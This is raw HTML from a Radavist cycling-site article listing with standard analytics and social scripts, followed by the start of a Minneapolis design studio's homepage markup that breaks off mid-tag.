https://theradavist.com/?p=166871">17 comments</span></a> </header> <a href="https://theradavist.com/2019/05/meet-the-new-quincy-julianas-answer-to-the-popular-santa-cruz-stigmata-amy-jurries/"> <img src="https://media.theradavist.com/uploads/2019/05/JulianaQuincy-1.jpg?fit=1024,682&amp;quality=75" class="attachment-medium size-medium wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/JulianaQuincy-1.jpg?w=2000&amp;quality=75 2000w, https://media.theradavist.com/uploads/2019/05/JulianaQuincy-1.jpg?resize=1024,682&amp;quality=75 1024w, https://media.theradavist.com/uploads/2019/05/JulianaQuincy-1.jpg?resize=768,512&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/05/JulianaQuincy-1.jpg?resize=1335,890&amp;quality=75 1335w, https://media.theradavist.com/uploads/2019/05/JulianaQuincy-1.jpg?resize=700,467&amp;quality=75 700w" sizes="(max-width: 1024px) 100vw, 1024px" /> </a> </article> <article> <header class="reportage-header cf"> <a href="https://theradavist.com/2019/05/cant-stop-wont-stop-with-winneteaux-spencer-harding/">Can&#8217;t Stop Won&#8217;t Stop With Winneteaux &#8211; Spencer Harding</a> <a href="https://theradavist.com/2019/05/cant-stop-wont-stop-with-winneteaux-spencer-harding/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="166643 https://theradavist.com/?p=166643">21 comments</span></a> </header> <a href="https://theradavist.com/2019/05/cant-stop-wont-stop-with-winneteaux-spencer-harding/"> <img src="https://media.theradavist.com/uploads/2019/05/Cant-Stop-Wont-Stop-58.jpg?fit=1024,684&amp;quality=75" class="attachment-medium size-medium wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/Cant-Stop-Wont-Stop-58.jpg?w=1997&amp;quality=75 1997w, https://media.theradavist.com/uploads/2019/05/Cant-Stop-Wont-Stop-58.jpg?resize=1024,684&amp;quality=75 1024w, https://media.theradavist.com/uploads/2019/05/Cant-Stop-Wont-Stop-58.jpg?resize=768,513&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/05/Cant-Stop-Wont-Stop-58.jpg?resize=1335,891&amp;quality=75 1335w, https://media.theradavist.com/uploads/2019/05/Cant-Stop-Wont-Stop-58.jpg?resize=700,467&amp;quality=75 700w" sizes="(max-width: 1024px) 100vw, 1024px" /> </a> </article> <article> <header class="reportage-header cf"> <a href="https://theradavist.com/2019/05/save-the-boundary-waters-with-northern-cx-works/">Save The Boundary Waters With Northern CX Works</a> <a href="https://theradavist.com/2019/05/save-the-boundary-waters-with-northern-cx-works/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="163420 https://theradavist.com/?p=163420">12 comments</span></a> </header> <a href="https://theradavist.com/2019/05/save-the-boundary-waters-with-northern-cx-works/"> <img src="https://media.theradavist.com/uploads/2019/04/PUMP.jpg?fit=1024,682&amp;quality=75" class="attachment-medium size-medium wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/04/PUMP.jpg?w=2000&amp;quality=75 2000w, https://media.theradavist.com/uploads/2019/04/PUMP.jpg?resize=1024,682&amp;quality=75 1024w, https://media.theradavist.com/uploads/2019/04/PUMP.jpg?resize=768,512&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/04/PUMP.jpg?resize=1335,890&amp;quality=75 1335w, https://media.theradavist.com/uploads/2019/04/PUMP.jpg?resize=700,467&amp;quality=75 700w" sizes="(max-width: 1024px) 100vw, 1024px" /> </a> </article> <article> <header class="reportage-header cf"> <a href="https://theradavist.com/2019/05/one-arm-bandit-little-wings-big-things-ryan-le-garrec/">One Arm Bandit: Little Wings, Big Things &#8211; Ryan Le Garrec</a> <a href="https://theradavist.com/2019/05/one-arm-bandit-little-wings-big-things-ryan-le-garrec/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="166750 https://theradavist.com/?p=166750">27 comments</span></a> </header> <a href="https://theradavist.com/2019/05/one-arm-bandit-little-wings-big-things-ryan-le-garrec/"> <img src="https://media.theradavist.com/uploads/2019/05/SHOT-N.jpg?fit=1024,614&amp;quality=75" class="attachment-medium size-medium wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/SHOT-N.jpg?w=2000&amp;quality=75 2000w, https://media.theradavist.com/uploads/2019/05/SHOT-N.jpg?resize=1024,614&amp;quality=75 1024w, https://media.theradavist.com/uploads/2019/05/SHOT-N.jpg?resize=768,461&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/05/SHOT-N.jpg?resize=1335,801&amp;quality=75 1335w, https://media.theradavist.com/uploads/2019/05/SHOT-N.jpg?resize=700,420&amp;quality=75 700w, https://media.theradavist.com/uploads/2019/05/SHOT-N.jpg?resize=600,360&amp;quality=75 600w, https://media.theradavist.com/uploads/2019/05/SHOT-N.jpg?resize=1200,720&amp;quality=75 1200w" sizes="(max-width: 1024px) 100vw, 1024px" /> </a> </article> <article> <header class="reportage-header cf"> <a href="https://theradavist.com/2019/05/sonoran-overnighter-spencer-harding/">Sonoran Overnighter &#8211; Spencer Harding</a> <a href="https://theradavist.com/2019/05/sonoran-overnighter-spencer-harding/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="166251 https://theradavist.com/?p=166251">10 comments</span></a> </header> <a href="https://theradavist.com/2019/05/sonoran-overnighter-spencer-harding/"> <img src="https://media.theradavist.com/uploads/2019/05/Sonoran-Overnighter-26.jpg?fit=1024,682&amp;quality=75" class="attachment-medium size-medium wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/Sonoran-Overnighter-26.jpg?w=2000&amp;quality=75 2000w, https://media.theradavist.com/uploads/2019/05/Sonoran-Overnighter-26.jpg?resize=1024,682&amp;quality=75 1024w, https://media.theradavist.com/uploads/2019/05/Sonoran-Overnighter-26.jpg?resize=768,512&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/05/Sonoran-Overnighter-26.jpg?resize=1335,890&amp;quality=75 1335w, https://media.theradavist.com/uploads/2019/05/Sonoran-Overnighter-26.jpg?resize=700,467&amp;quality=75 700w" sizes="(max-width: 1024px) 100vw, 1024px" /> </a> </article> <article> <header class="reportage-header cf"> <a href="https://theradavist.com/2019/05/brents-fat-chance-chris-cross-makes-him-jump-jump/">Brent&#8217;s Fat Chance Chris Cross Makes Him Jump, Jump</a> <a href="https://theradavist.com/2019/05/brents-fat-chance-chris-cross-makes-him-jump-jump/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="166175 https://theradavist.com/?p=166175">32 comments</span></a> </header> <a href="https://theradavist.com/2019/05/brents-fat-chance-chris-cross-makes-him-jump-jump/"> <img src="https://media.theradavist.com/uploads/2019/05/brentfatchance-1.jpg?fit=1024,682&amp;quality=75" class="attachment-medium size-medium wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/brentfatchance-1.jpg?w=2000&amp;quality=75 2000w, https://media.theradavist.com/uploads/2019/05/brentfatchance-1.jpg?resize=1024,682&amp;quality=75 1024w, https://media.theradavist.com/uploads/2019/05/brentfatchance-1.jpg?resize=768,512&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/05/brentfatchance-1.jpg?resize=1335,890&amp;quality=75 1335w, https://media.theradavist.com/uploads/2019/05/brentfatchance-1.jpg?resize=700,467&amp;quality=75 700w" sizes="(max-width: 1024px) 100vw, 1024px" /> </a> </article> <article> <header class="reportage-header cf"> <a href="https://theradavist.com/2019/05/equipping-an-amateur-bikepacker-and-professional-filmmaker-for-the-peruvian-andes-morgan-taylor/">Equipping an Amateur Bikepacker (and Professional Filmmaker) for the Peruvian Andes – Morgan Taylor</a> <a href="https://theradavist.com/2019/05/equipping-an-amateur-bikepacker-and-professional-filmmaker-for-the-peruvian-andes-morgan-taylor/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="166562 https://theradavist.com/?p=166562">27 comments</span></a> </header> <a href="https://theradavist.com/2019/05/equipping-an-amateur-bikepacker-and-professional-filmmaker-for-the-peruvian-andes-morgan-taylor/"> <img src="https://media.theradavist.com/uploads/2019/05/morgan-taylor-ben-johnson-kona-sutra-ltd-24.jpg?fit=1024,682&amp;quality=75" class="attachment-medium size-medium wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/morgan-taylor-ben-johnson-kona-sutra-ltd-24.jpg?w=2000&amp;quality=75 2000w, https://media.theradavist.com/uploads/2019/05/morgan-taylor-ben-johnson-kona-sutra-ltd-24.jpg?resize=1024,682&amp;quality=75 1024w, https://media.theradavist.com/uploads/2019/05/morgan-taylor-ben-johnson-kona-sutra-ltd-24.jpg?resize=768,512&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/05/morgan-taylor-ben-johnson-kona-sutra-ltd-24.jpg?resize=1335,890&amp;quality=75 1335w, https://media.theradavist.com/uploads/2019/05/morgan-taylor-ben-johnson-kona-sutra-ltd-24.jpg?resize=700,467&amp;quality=75 700w" sizes="(max-width: 1024px) 100vw, 1024px" /> </a> </article> <article> <header class="reportage-header cf"> <a href="https://theradavist.com/2019/05/cactus-fruit-and-community-at-fass-bike-locke-hassett/">Cactus Fruit and Community at FASS Bike &#8211; Locke Hassett</a> <a href="https://theradavist.com/2019/05/cactus-fruit-and-community-at-fass-bike-locke-hassett/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="164376 https://theradavist.com/?p=164376">5 comments</span></a> </header> <a href="https://theradavist.com/2019/05/cactus-fruit-and-community-at-fass-bike-locke-hassett/"> <img src="https://media.theradavist.com/uploads/2019/04/FASS-Bike-16.jpg?fit=1024,679&amp;quality=75" class="attachment-medium size-medium wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/04/FASS-Bike-16.jpg?w=2500&amp;quality=75 2500w, https://media.theradavist.com/uploads/2019/04/FASS-Bike-16.jpg?resize=1024,679&amp;quality=75 1024w, https://media.theradavist.com/uploads/2019/04/FASS-Bike-16.jpg?resize=768,509&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/04/FASS-Bike-16.jpg?resize=1335,885&amp;quality=75 1335w, https://media.theradavist.com/uploads/2019/04/FASS-Bike-16.jpg?resize=700,464&amp;quality=75 700w" sizes="(max-width: 1024px) 100vw, 1024px" /> </a> </article> <div class="reportage-navigation"> <a href="https://theradavist.com/page/2/" >Older Entries</a> </div> </section> <!-- articles-reportage --> </div> <!-- end #maincontent --> <!-- remove the_content filter --> </div> <!-- end #content-wrap --> <footer> <div id="jquerytrigger"></div> </footer> <!-- Quantcast Tag --> <script type="text/javascript"> var _qevents = _qevents || []; (function() { var elem = document.createElement('script'); elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js"; elem.async = true; elem.type = "text/javascript"; var scpt = document.getElementsByTagName('script')[0]; scpt.parentNode.insertBefore(elem, scpt); })(); _qevents.push({ qacct:"p-JZ9qQa1yngUjp" }); </script> <noscript> <div style="display:none;"> <img src="//pixel.quantserve.com/pixel/p-JZ9qQa1yngUjp.gif" border="0" height="1" width="1" alt="Quantcast"/> </div> </noscript> <!-- End Quantcast tag --> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script> <script type='text/javascript'> /* <![CDATA[ */ var countVars = {"disqusShortname":"pinp"}; /* ]]> */ </script> <script type='text/javascript' src='https://theradavist.com/app/plugins/disqus-comment-system/public/js/comment_count.js?ver=3.0.17'></script> <script type='text/javascript' src='https://theradavist.com/app/themes/radavist/inc/js/custom.js?ver=5.1.1'></script> <script type='text/javascript' src='https://theradavist.com/app/themes/radavist/inc/js/jquery.waypoints.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://theradavist.com/app/themes/radavist/inc/js/waypoints-infinite.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://theradavist.com/app/themes/radavist/inc/js/waypoints-sticky.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://theradavist.com/app/themes/radavist/inc/js/jquery.cycle2.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://theradavist.com/wp/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script> var gadwpDnt = false; var gadwpProperty = 'UA-49564916-1'; var gadwpDntFollow = true; var gadwpOptout = false; var disableStr = 'ga-disable-' + gadwpProperty; if(gadwpDntFollow && (window.doNotTrack === "1" || navigator.doNotTrack === "1" || navigator.doNotTrack === "yes" || navigator.msDoNotTrack === "1")) { gadwpDnt = true; } if (gadwpDnt || (document.cookie.indexOf(disableStr + '=true') > -1 && gadwpOptout)) { window[disableStr] = true; } function gaOptout() { var expDate = new Date; expDate.setFullYear(expDate.getFullYear( ) + 10); document.cookie = disableStr + '=true; expires=' + expDate.toGMTString( ) + '; path=/'; window[disableStr] = true; } </script> <!-- BEGIN ExactMetrics v5.3.8 Universal Analytics - https://exactmetrics.com/ --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-49564916-1', 'auto', {'allowLinker': true}); ga('require', 'linker'); ga('linker:autoLink', ['shop.theradavist.com']); ga('set', 'forceSSL', true); ga('send', 'pageview'); </script> <!-- END ExactMetrics Universal Analytics --> </body> </html>
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"> <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"> <link rel="manifest" href="/site.webmanifest"> <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5"> <meta name="msapplication-TileColor" content="#ffffff"> <meta name="theme-color" content="#ffffff"> <!-- <title>--><!----><!--</title>--> <title>Object | A design &amp; technology studio.</title> <link rel="canonical" href="https://object.design/"> <meta name="description" content="We specialize in brand identities, design systems and digital experiences. Our goal is to help create clarity, affinity and purpose with our client's brands. Our focus is strategy, design, technology and nothing else." /> <meta name="resource-type" content="document" /> <meta http-equiv="content-type" content="text/html; charset=US-ASCII" /> <meta http-equiv="content-language" content="en-us" /> <meta name="author" content="Object | A design &amp; technology studio." /> <meta name="contact" content="[email protected]" /> <meta name="copyright" content="Copyright (c)2018-2019 Object | A design &amp; technology studio.. All Rights Reserved." /> <meta property="og:title" content="Object is a design & technology studio based in Minneapolis." /> <meta property="og:description" content="We specialize in brand identities, design systems and digital experiences. Our goal is to help create clarity, affinity and purpose with our client's brands. Our focus is strategy, design, technology and nothing else." /> <meta property="fb:app_id" content="1152500981567326"/> <meta property="og:image" content="https://object.design/content/uploads/2018/08/object_ogimage_homepage.png" /> <meta property="og:url" content="https://object.design/" /> <meta property="og:type" content="website" /> <meta property="og:site_name" content="Object | A design &amp; technology studio." /> <meta name="twitter:card" content="summary" /> <meta name="twitter:title" content="Object | A design &amp; technology studio." /> <meta name="twitter:description" content="We specialize in brand identities, design systems and digital experiences. Our goal is to help create clarity, affinity and purpose with our client's brands. Our focus is strategy, design, technology and nothing else." /> <meta name="twitter:image" content="https://object.design/content/uploads/2018/08/object_ogimage_homepage.png" /> <!-- IMPLEMENT PAGE CUSTOMIZATION TEMPLATE PART --> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-PRSLTTT');</script> <!-- End Google Tag Manager --> <title>Object | A design &amp; technology studio. &#8211; Object&#039;s studio website.</title> <link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/object.design\/core\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='object_baseline_parent-style-css' href='https://object.design/content/themes/object_baseline_parent_theme/assets/css/app-min.css?ver=1556730053' type='text/css' media='all' /> <link rel='stylesheet' id='primary-style-css' href='https://object.design/content/themes/object_baseline_child/assets/css/app-min.css?ver=4.9.4' type='text/css' media='all' /> <style id='primary-style-inline-css' type='text/css'> body { --object-icon-color-left: #0000ff;--object-icon-color-right: #ff4400;--object-text-color: #0000ff;--menu-elements-color: #0000ff;--menu-elements-detail-color: #00ff79;--component-separator-color: #e0e0e0;--page-background-color: #232428;--page-text-color: #e0e0e0;--hover-decorator-color: #ff4400;} </style> <script type='text/javascript' src='https://object.design/core/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://object.design/core/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <link rel='https://api.w.org/' href='https://object.design/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://object.design/core/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://object.design/core/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.4" /> <link rel="canonical" href="https://object.design/" /> <link rel='shortlink' href='https://object.design/' /> <link rel="alternate" type="application/json+oembed" href="https://object.design/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fobject.design%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://object.design/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fobject.design%2F&#038;format=xml" /> </head> <body class="home page-template-default page page-id-338"> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-PRSLTTT" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <div id="page" class="hfeed page-wrap"> <header id="masthead" class="site-header" role="banner" itemscope="itemscope" itemtype="http://schema.org/WPHeader"> <nav class="site-header__branding"> <ul> <li> <a class="site-header__logo" href="https://object.design/" rel="home"> <svg width="50px" height="50px" viewBox="0 0 50 50" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <!-- Generator: Sketch 49.3 (51167) - http://www.bohemiancoding.com/sketch --> <desc>Created with Sketch.</desc> <defs></defs> <g id="HOME" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"> <g id="HOME---DESKTOP" transform="translate(-40.000000, -40.000000)"> <g id="Object" transform="translate(-88.000000, 0.000000)"> <g id="Logo/Object---Blue-+-Red" transform="translate(128.000000, 40.000000)"> <path d="M24.7194827,0.298652482 L24.7194827,50.0000709 C38.5155443,50.0000709 49.6998252,38.8741844 49.6998252,25.1493617 C49.6998252,11.424539 38.5155443,0.298652482 24.7194827,0.298652482" id="Fill-Right" fill="#FF4400"></path> <path d="M-7.12919492e-05,25.1493972 C-7.12919492e-05,38.8742199 11.1842097,50.0001064 24.9802713,50.0001064 L24.9802713,0.298687943 C11.1842097,0.298687943 -7.12919492e-05,11.4245745 -7.12919492e-05,25.1493972" id="Fill-Left" fill="#0000FF"></path> </g> </g> </g> </g> </svg> </a> </li> <li> <a class="site-header__wordmark" href="https://object.design/" rel="home"> <svg width="115px" height="40px" viewBox="0 0 115 40" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <!-- Generator: Sketch 49.3 (51167) - http://www.bohemiancoding.com/sketch --> <desc>Created with Sketch.</desc> <defs></defs> <g id="HOME" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"> <g id="HOME---DESKTOP" transform="translate(-742.000000, -48.000000)" fill="#0000FF"> <g id="Object" transform="translate(-88.000000, 0.000000)"> <g id="Wordmark/Object---Blue" transform="translate(830.000000, 48.000000)"> <path d="M14.2721723,6.29793888 C8.69270565,6.29793888 5.09434989,10.4287136 5.09434989,16.3414357 C5.09434989,22.2535892 8.69270565,26.3849325 14.2721723,26.3849325 C19.8919423,26.3849325 23.4499946,22.2535892 23.4499946,16.3414357 C23.4499946,10.4287136 19.8919423,6.29793888 14.2721723,6.29793888 M14.2721723,30.9211087 C6.22625104,30.9211087 -0.000340592121,25.0487562 -0.000340592121,16.3414357 C-0.000340592121,7.63468372 6.22625104,1.7623312 14.2721723,1.7623312 C22.3180935,1.7623312 28.5446851,7.63468372 28.5446851,16.3414357 C28.5446851,25.0487562 22.3180935,30.9211087 14.2721723,30.9211087" id="Fill-1"></path> <path d="M35.0888221,21.8896375 C35.0888221,24.8053447 37.6358835,26.9517555 40.5065075,26.9517555 C43.7006939,26.9517555 46.2880587,24.8457143 46.2880587,20.3914144 C46.2880587,15.9365458 43.7006939,13.8305046 40.5468109,13.8305046 C37.5552767,13.8305046 35.0888221,16.017285 35.0888221,18.9335608 L35.0888221,21.8896375 Z M35.0888221,12.2919119 C36.6254602,10.8744279 38.8086557,9.86177683 41.5578018,9.86177683 C46.6116212,9.86177683 50.9377088,13.5877186 50.9377088,20.3914144 C50.9377088,27.1951102 46.2880587,30.9210519 41.5578018,30.9210519 C38.4850932,30.9210519 36.4228079,29.6656148 35.0888221,28.2885004 L35.0888221,30.5156503 L30.4794754,30.5156503 L30.4794754,0.952608387 L35.0888221,0.952608387 L35.0888221,12.2919119 Z" id="Fill-4"></path> <path d="M58.0926411,4.75906183 C58.0926411,6.33859275 56.7989586,7.63439943 55.2225848,7.63439943 C53.6859467,7.63439943 52.3922643,6.33859275 52.3922643,4.75906183 C52.3922643,3.1800995 53.6859467,1.88372424 55.2225848,1.88372424 C56.7989586,1.88372424 58.0926411,3.1800995 58.0926411,4.75906183 Z M57.5675615,10.266951 L57.5675615,33.2696517 C57.5675615,37.2389481 55.2628882,39.0203269 51.8263137,39.0203269 C50.6132381,39.0203269 49.8043318,38.85828 48.8745153,38.6149254 L48.8745153,34.6063966 L49.1169034,34.4847193 C49.6834216,34.6871357 50.2493722,34.8895522 51.0577108,34.8895522 C52.3110898,34.8895522 52.9179114,34.2413646 52.9179114,32.8238806 L52.9179114,10.266951 L57.5675615,10.266951 Z" id="Fill-6"></path> <path d="M75.154944,18.28543 C74.8716849,15.2884151 72.5267081,13.628145 69.6560842,13.628145 C66.9069381,13.628145 64.6425681,15.3287846 64.1174886,18.28543 L75.154944,18.28543 Z M64.0363142,21.6469083 C64.2383988,24.9674485 66.5027688,26.9921819 69.7372586,26.9921819 C72.6078826,26.9921819 74.3057343,25.5746979 75.0334661,23.4288557 L79.0365588,23.6716418 L79.1977724,23.8740583 C77.8637866,28.4102345 74.54869,30.9211087 69.6560842,30.9211087 C63.5912738,30.9211087 59.5484453,26.7090263 59.5484453,20.3914712 C59.5484453,14.0733475 64.2787022,9.86183369 69.6560842,9.86183369 C75.3570286,9.86183369 79.4810316,13.7094527 79.4810316,20.2294243 L79.4810316,21.6469083 L64.0363142,21.6469083 Z" id="Fill-8"></path> <path d="M97.3056364,22.8213788 L101.308729,23.0641649 L101.469943,23.2665814 C100.499823,28.1666525 96.9417705,30.9208813 91.7664732,30.9208813 C85.9037475,30.9208813 81.4164463,26.6689979 81.4164463,20.3918124 C81.4164463,14.1140583 85.9037475,9.86217484 91.7664732,9.86217484 C97.0229449,9.86217484 100.661036,12.7375124 101.469943,17.5159062 L101.308729,17.7183227 L97.3056364,17.9616773 C96.6993824,15.5315423 94.8391818,13.9520114 91.7664732,13.9520114 C88.4508089,13.9520114 85.9440509,16.2604691 85.9440509,20.3918124 C85.9440509,24.5220185 88.4508089,26.8304762 91.7664732,26.8304762 C94.8391818,26.8304762 96.618208,25.332253 97.3056364,22.8213788" id="Fill-10"></path> <path d="M110.2386,10.266951 L114.76734,10.266951 L114.76734,13.9115849 L110.2386,13.9115849 L110.2386,24.886425 C110.2386,26.2226013 111.007203,26.9924662 112.543274,26.9924662 C113.311309,26.9924662 113.79722,26.9111585 114.44321,26.7491116 L114.564688,26.8304193 L114.564688,30.5154229 C113.392483,30.7991471 112.543274,30.9208244 111.168985,30.9208244 C107.85332,30.9208244 105.589518,29.0985075 105.589518,25.2918266 L105.589518,13.9115849 L101.829381,13.9115849 L101.829381,10.266951 L105.589518,10.266951 L105.589518,4.31385928 L105.952816,4.31385928 L110.2386,5.81208244 L110.2386,10.266951 Z" id="Fill-12"></path> </g> </g> </g> </g> </svg> </a> </li> <li> <a class="site-header__menu-button" href="#show-menu" > <svg id="menu_button" width="50px" height="50px" viewBox="0 0 50 50" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <!-- Generator: Sketch 49.3 (51167) - http://www.bohemiancoding.com/sketch --> <desc>Created with Sketch.</desc> <defs></defs> <g id="menu_button__g" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"> <g id="menu_button__g__g" transform="translate(-1510.000000, -40.000000)" fill="#0000FF"> <g id="menu_button__g__g__g" transform="translate(-88.000000, 0.000000)"> <g id="menu-button__background" transform="translate(1598.000000, 40.000000)"> <path d="M25,0 C11.193,0 0,11.193 0,25 C0,38.807 11.193,50 25,50 C38.807,50 50,38.807 50,25 C50,11.193 38.807,0 25,0 Z" id="Page-1"></path> </g> <g id="menu-button__details" transform="translate(1598.000000, 40.000000)" fill="#FFFFFF"> <path id="Line_1" d="M15,23.5 L35,23.5 L35,21.5 L15,21.5 L15,23.5 Z"></path> <path id="Line_2" d="M15,28.5 L35,28.5 L35,26.5 L15,26.5 L15,28.5 Z"></path> </g> </g> </g> </g> </svg> </a> </li> </ul> </nav> </header><!-- #masthead --> <section class="site-menu"> <nav id="primary-nav" class="site-header__nav--primary" role="navigation" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement"> <div class="menu-main-navigation-container"><ul id="menu-main-navigation" class="menu"><li class="menu__item menu__item--depth-0"><a href="https://object.design/us/">Us</a></li> <li class="menu__item menu__item--depth-0"><a href="https://object.design/skills/">Skills</a></li> <li class="menu__item menu__item--depth-0"><a href="https://object.design/stuff/">Stuff</a></li> <li class="menu__item menu__item--depth-0"><a href="https://object.design/contact/">Contact</a></li> </ul></div> </nav><!-- #site-navigation --> <nav id="work-nav" class="site-header__nav--work" role="navigation" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement"> <span class="site-header__nav-rule"></span> <div class="menu-main-work-tiles-container"><ul id="menu-main-work-tiles" class="menu"> <li> <a href='https://object.design/work/misfit/'> <span class='link-index'>01</span> <div class='link-title'> <span class='link-title__text'>Misfit</span> </div> <img class='lazy' data-src='https://object.design/content/uploads/2018/08/object_menu_misfit.jpg' src='https://object.design/content/uploads/2018/08/object_menu_misfit-150x150.jpg' /> <noscript><img src='https://object.design/content/uploads/2018/08/object_menu_misfit.jpg' /></noscript> </a></li> <li> <a href='https://object.design/work/twins/'> <span class='link-index'>02</span> <div class='link-title'> <span class='link-title__text'>Minnesota Twins</span> </div> <img 